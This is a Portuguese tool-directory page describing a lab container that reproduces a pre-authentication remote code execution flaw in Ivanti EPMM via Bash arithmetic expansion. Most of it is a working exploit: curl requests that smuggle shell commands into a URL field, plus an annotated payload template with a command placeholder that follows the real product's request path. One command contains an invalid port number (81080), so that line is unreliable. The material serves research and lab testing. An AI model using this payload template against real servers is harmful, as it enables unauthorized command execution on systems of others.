Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Uma aplicação de demonstração simples que mostra como reproduzir a vulnerabilidade de RCE pré-autenticação do Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) para fins educacionais e de pesquisa em segurança. | Kitploit
Ferramentas/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Uma aplicação de demonstração simples que mostra como reproduzir a vulnerabilidade de RCE pré-autenticação do Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) para fins educacionais e de pesquisa em segurança.

Ver Repositório
3há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Alvo Dummy de RCE pré-autenticação Ivanti EPMM

Um aplicativo de demonstração simples que mostra como reproduzir a vulnerabilidade de RCE pré-autenticação do Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) para fins educacionais e de pesquisa em segurança.

Visão Geral da Vulnerabilidade

Esta vulnerabilidade explora o comportamento da expansão aritmética do Bash. Quando uma variável contendo uma referência a outra variável é usada em contexto aritmético, e essa variável referenciada contém um índice de array com substituição de comando, o comando é executado.

A Cadeia de Exploração

  1. A requisição contém st=theValue (string literal "theValue" com preenchimento)
  2. A requisição contém h=gPath[\comando`]` (comando no índice do array)
  3. O script Bash analisa pares chave=valor em um loop, atualizando theValue a cada iteração
  4. gStartTime é definido como a string literal "theValue"
  • Após o loop, theValue contém gPath[\comando`]`
  • Quando [[ ${currentTime} -gt ${gStartTime} ]] é avaliado:
    • ${gStartTime} → "theValue" (string)
    • O contexto aritmético trata theValue como referência de variável
    • theValue → gPath[\comando`]`
    • O índice do array aciona a substituição de comando → RCE!
  • Início Rápido

    root@kitploit:~
    # Compilar e iniciar o container
    docker-compose up --build -d
    
    # Verificar se está em execução
    curl http://localhost:8180/health
    

    Testando a Vulnerabilidade

    1. Teste de Criação de Arquivo

    Crie um arquivo para provar a execução de comandos:

    root@kitploit:~
    # Payload codificado em URL: id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # Verificar se o arquivo foi criado
    cat artifacts/poc
    

    2. Teste Baseado em Tempo

    Verifique com um comando sleep:

    root@kitploit:~
    # Deve levar ~5 segundos para responder
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. Execução de Comando Personalizado

    root@kitploit:~
    # Escrever conteúdo personalizado
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    Estrutura da URL

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMANDO%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ Payload: gPath[`COMANDO`]
                                   │      │              └─ Timestamp final (quaisquer 10 dígitos)
                                   │      └─ CRÍTICO: literal "theValue" + 2 espaços (10 caracteres no total)
                                   └─ Índice da chave (qualquer valor)
    

    Depuração

    root@kitploit:~
    # Visualizar logs do container
    docker-compose logs -f
    
    # Obter um shell no container
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # Verificar logs de erro do nginx
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    Limpeza

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    Referências

    • Postagem do Blog do WatchTowr Labs

    Aviso Legal

    Isto é apenas para fins educacionais e de testes de segurança autorizados. Não use contra sistemas que você não possui ou para os quais não tenha permissão explícita para testar.

    Baixar ferramenta